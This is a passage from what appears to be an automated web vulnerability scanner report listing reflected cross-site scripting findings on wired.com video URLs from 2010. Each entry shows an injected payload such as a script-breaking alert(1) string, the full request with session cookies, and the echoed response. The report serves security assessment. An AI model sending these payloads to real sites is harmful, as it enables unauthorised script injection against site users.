Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=280
Expires: Mon, 22 Nov 2010 00:54:31 GMT
Date: Mon, 22 Nov 2010 00:49:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106669


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "culture2fd0d"-alert(1)-"6f7deddbb2f","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.892. http://www.wired.com/video/events [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/events

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ca37"><a>22302db7157 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video5ca37"><a>22302db7157/events HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29340
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:52:14 GMT
Date: Mon, 22 Nov 2010 00:47:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video5ca37"><a>22302db7157 ss_events">
...[SNIP]...

1.893. http://www.wired.com/video/events [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/events

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e8d7"><a>6d7a5676676 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/events9e8d7"><a>6d7a5676676 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=292
Expires: Mon, 22 Nov 2010 00:53:33 GMT
Date: Mon, 22 Nov 2010 00:48:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106671


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_events9e8d7"><a>6d7a5676676">
...[SNIP]...

1.894. http://www.wired.com/video/events [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/events

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb819"-alert(1)-"a2a012537a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/eventseb819"-alert(1)-"a2a012537a3 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:54:51 GMT
Date: Mon, 22 Nov 2010 00:49:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106712


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "eventseb819"-alert(1)-"a2a012537a3","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.895. http://www.wired.com/video/gadgets [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/gadgets

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49043"><a>f9aca00d89 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video49043"><a>f9aca00d89/gadgets HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29344
Vary: Accept-Encoding
Cache-Control: max-age=279
Expires: Mon, 22 Nov 2010 00:52:25 GMT
Date: Mon, 22 Nov 2010 00:47:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video49043"><a>f9aca00d89 ss_gadgets">
...[SNIP]...

1.896. http://www.wired.com/video/gadgets [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/gadgets

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c2f0"-alert(1)-"7cdcaacc317 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/gadgets9c2f0"-alert(1)-"7cdcaacc317 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=295
Expires: Mon, 22 Nov 2010 00:55:09 GMT
Date: Mon, 22 Nov 2010 00:50:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106669


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "video","gadgets9c2f0"-alert(1)-"7cdcaacc317"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.897. http://www.wired.com/video/gadgets [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/gadgets

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e9eb"><a>48a2c0c35be was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/gadgets4e9eb"><a>48a2c0c35be HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:54:14 GMT
Date: Mon, 22 Nov 2010 00:49:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106680


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_gadgets4e9eb"><a>48a2c0c35be">
...[SNIP]...

1.898. http://www.wired.com/video/gaming [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/gaming

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c542"><a>37dbceb866c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video8c542"><a>37dbceb866c/gaming HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29397
Vary: Accept-Encoding
Cache-Control: max-age=296
Expires: Mon, 22 Nov 2010 00:52:44 GMT
Date: Mon, 22 Nov 2010 00:47:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video8c542"><a>37dbceb866c ss_gaming">
...[SNIP]...

1.899. http://www.wired.com/video/gaming [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/gaming

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4bad"><a>b536094fcc3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/gamingf4bad"><a>b536094fcc3 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:54:13 GMT
Date: Mon, 22 Nov 2010 00:49:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106678


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_gamingf4bad"><a>b536094fcc3">
...[SNIP]...

1.900. http://www.wired.com/video/gaming [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/gaming

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de480"-alert(1)-"9db9e95ab77 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/gamingde480"-alert(1)-"9db9e95ab77 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:55:17 GMT
Date: Mon, 22 Nov 2010 00:50:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106667


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "gamingde480"-alert(1)-"9db9e95ab77","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.901. http://www.wired.com/video/harry-potter-and-the-halfblood-prince/14545305001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/harry-potter-and-the-halfblood-prince/14545305001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload cecad--><script>alert(1)</script>d8815df45f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /videocecad--><script>alert(1)</script>d8815df45f9/harry-potter-and-the-halfblood-prince/14545305001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29462
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:59:02 GMT
Date: Mon, 22 Nov 2010 00:54:02 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /videocecad--><script>alert(1)</script>d8815df45f9/harry-potter-and-the-halfblood-prince/14545305001
-->
...[SNIP]...

1.902. http://www.wired.com/video/harry-potter-and-the-halfblood-prince/14545305001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/harry-potter-and-the-halfblood-prince/14545305001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e1b1"><a>72a1202a501 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video3e1b1"><a>72a1202a501/harry-potter-and-the-halfblood-prince/14545305001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29428
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:58:09 GMT
Date: Mon, 22 Nov 2010 00:53:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video3e1b1"><a>72a1202a501 ss_harry-potter-and-the-halfblood-prince c_14545305001">
...[SNIP]...

1.903. http://www.wired.com/video/harry-potter-and-the-halfblood-prince/14545305001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/harry-potter-and-the-halfblood-prince/14545305001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c34c3"-alert(1)-"ee085e60c1e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/harry-potter-and-the-halfblood-princec34c3"-alert(1)-"ee085e60c1e/14545305001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=271
Expires: Mon, 22 Nov 2010 00:59:42 GMT
Date: Mon, 22 Nov 2010 00:55:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106757


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "14545305001","harry-potter-and-the-halfblood-princec34c3"-alert(1)-"ee085e60c1e","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.904. http://www.wired.com/video/harry-potter-and-the-halfblood-prince/14545305001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/harry-potter-and-the-halfblood-prince/14545305001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84e8e"><a>bee2d49739b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/harry-potter-and-the-halfblood-prince84e8e"><a>bee2d49739b/14545305001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:59:17 GMT
Date: Mon, 22 Nov 2010 00:54:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106758


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_harry-potter-and-the-halfblood-prince84e8e"><a>bee2d49739b c_14545305001">
...[SNIP]...

1.905. http://www.wired.com/video/harry-potter-and-the-halfblood-prince/14545305001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/harry-potter-and-the-halfblood-prince/14545305001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa393"-alert(1)-"0c94552f5e1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/harry-potter-and-the-halfblood-prince/14545305001aa393"-alert(1)-"0c94552f5e1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 01:01:21 GMT
Date: Mon, 22 Nov 2010 00:56:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106775


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "14545305001aa393"-alert(1)-"0c94552f5e1","harry-potter-and-the-halfblood-prince","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.906. http://www.wired.com/video/harry-potter-and-the-halfblood-prince/14545305001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/harry-potter-and-the-halfblood-prince/14545305001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dbca"><a>251f69d7bf9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/harry-potter-and-the-halfblood-prince/145453050019dbca"><a>251f69d7bf9 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
